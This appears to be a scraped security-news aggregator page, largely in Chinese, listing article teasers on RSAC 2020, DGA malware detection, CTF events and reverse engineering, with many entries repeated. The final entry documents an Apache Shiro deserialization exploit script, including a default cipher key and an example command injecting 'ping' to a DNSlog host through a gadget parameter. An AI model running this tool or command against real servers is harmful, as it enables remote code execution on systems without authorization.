创新沙盒,罕见领域分布的背后 - RSAC 2020 (1)
创新沙盒比赛十强名单公布后,各家报道都纷纷加以分析,指出从榜单构成数目来看,应用安全和SaaS安全占据绝大多数。虽然赛事组织者不满固步自封,努力创新求变,套路明显发生改变也是正常的,但市场趋势真的是应用安全要占据半壁江山吗?
Aggregator
创新沙盒,罕见领域分布的背后 - RSAC 2020 (1)
5 years 1 month ago
创新沙盒比赛十强名单公布后,各家报道都纷纷加以分析,指出从榜单构成数目来看,应用安全和SaaS安全占据绝大多数。虽然赛事组织者不满固步自封,努力创新求变,套路明显发生改变也是正常的,但市场趋势真的是应用安全要占据半壁江山吗?
创新沙盒,罕见领域分布的背后 - RSAC 2020 (1)
5 years 1 month ago
创新沙盒比赛十强名单公布后,各家报道都纷纷加以分析,指出从榜单构成数目来看,应用安全和SaaS安全占据绝大多数。虽然赛事组织者不满固步自封,努力创新求变,套路明显发生改变也是正常的,但市场趋势真的是应用安全要占据半壁江山吗?
创新沙盒,罕见领域分布的背后 - RSAC 2020 (1)
5 years 1 month ago
创新沙盒比赛十强名单公布后,各家报道都纷纷加以分析,指出从榜单构成数目来看,应用安全和SaaS安全占据绝大多数。虽然赛事组织者不满固步自封,努力创新求变,套路明显发生改变也是正常的,但市场趋势真的是应用安全要占据半壁江山吗?
New Zealand condemns malicious cyber activity against Georgia
5 years 1 month ago
Attacking the Organism: Financial Services
5 years 2 months ago
Financial services are a well-known target of attack, based on a range of motivations. F5 Labs' Preston Hogue writes for SecurityWeek, discussing financial institutions' unique security environment , and how the need to understand the entire organism is critical.
Introducing Guardicore Threat Intelligence Firewall
5 years 2 months ago
Guardicore?s Threat Intelligence Firewall blocks connections to malicious IPs, limiting security attack surface before reaching critical assets.
Mor Matalon
Tackling DGA Based Malware Detection in DNS Traffic
5 years 2 months ago
Earlier this year, Akamai's Enterprise team tackled the problem of DGA detection in the wild by using Neural Networks, essentially creating a state-of-the-art solution for near online detection of DGA communication....
Yael Daihes
Pikachu靶场SQL注入刷题记录 - PaperPen
5 years 2 months ago
一个非常值得一刷的靶场
PaperPen
汇聚共克时艰的网安力量——“春秋杯”新春战“疫”网络安全公益赛正式启动
5 years 2 months ago
汇聚共克时艰的网安力量,助力打赢疫情防控阻击战
汇聚共克时艰的网安力量——“春秋杯”新春战“疫”网络安全公益赛正式启动
5 years 2 months ago
汇聚共克时艰的网安力量,助力打赢疫情防控阻击战
汇聚共克时艰的网安力量——“春秋杯”新春战“疫”网络安全公益赛正式启动
5 years 2 months ago
汇聚共克时艰的网安力量,助力打赢疫情防控阻击战
汇聚共克时艰的网安力量——“春秋杯”新春战“疫”网络安全公益赛正式启动
5 years 2 months ago
汇聚共克时艰的网安力量,助力打赢疫情防控阻击战
汇聚共克时艰的网安力量——“春秋杯”新春战“疫”网络安全公益赛正式启动
5 years 2 months ago
汇聚共克时艰的网安力量,助力打赢疫情防控阻击战
汇聚共克时艰的网安力量——“春秋杯”新春战“疫”网络安全公益赛正式启动
5 years 2 months ago
汇聚共克时艰的网安力量,助力打赢疫情防控阻击战
分享一个漏洞的发现到利用的过程
5 years 2 months ago
本文将分享一个RocketMQ的漏洞从发现到自动化利用的实践过程,最后也将安利一个开源的神器Arthas(阿尔萨斯)。本文技术含金量不高,但也希望读者能从中有所收获。
分享一个漏洞的发现到利用的过程
5 years 2 months ago
本文将分享一个RocketMQ的漏洞从发现到自动化利用的实践过程,最后也将安利一个开源的神器Arthas(阿尔萨斯)。本文技术含金量不高,但也希望读者能从中有所收获。
PC微信逆向--实现消息防撤回 - luoyesiqiu
5 years 2 months ago
自从聊天软件消息撤回功能问世后,对于撤回的消息,我们对它一直有种强烈的好奇感。“Ta刚撤回了什么?是骂我的话?还是说喜欢我?还是把发给其他人的消息误发给了我?好气呀,都看不到了...”这是我们看到消息被撤回后的内心独白。但是今天,看完了本篇文章你就可以说: 我们看一下效果图,撤回的消息被我们看到了,
luoyesiqiu
2600 - The Hacker Quarterly - Pass the Cookie Article
5 years 2 months ago
Pass the Cookie made it into the latest 2600 magazine! Very excited about this!
I was just walking around Capitol Hill and stopped by Ada’s Technical Books on 15th Avenue - a great coffee shop with lots of technical books. Right after walking in to grab a cup of tea, I saw the latest Hacker Quarterly. A few months back I submitted an article about “Pass the Cookie”, so I had to check, and the article got indeed published!
Apache Shiro 反序列化漏洞利用工具使用
5 years 2 months ago
Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。
工具下载地址:Shiro_Exploit
该脚本通过网络收集到的22个key,利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。漏洞利用则可以选择Gadget和参数,增强灵活性。
环境Python2.7
requests
Jdk 1.8
使用说明 usage: shiro_exploit.py [-h] -u URL [-t TYPE] [-g GADGET] [-p PARAMS] [-k KEY] OPTIONS: -h, --help show this help message and exit -u URL, --url URL Target url. -t TYPE, --type TYPE Check or Exploit. Check :1 , Exploit:2 , Find gadget:3 -g GADGET, --gadget GADGET gadget -p PARAMS, --params PARAMS gadget params -k KEY, --key KEY CipherKey Example: python shiro_exploit.py -u target检测默认只需要使用-u参数即可。
检测可用gadget的方式可以运行
python shiro_exploit.py -u http://target/ -t 3 -p "ping -c 2 {dnshost}" -k "kPH+bIxk5D2deZiIxcaaaA=="
程序执行时会获取dnslog的域名替换 {dnshost} 这个值。不需要进行修改。目前还没解决windows和linux系统通用性的问题。这里-p自己根据实际情况指定下吧。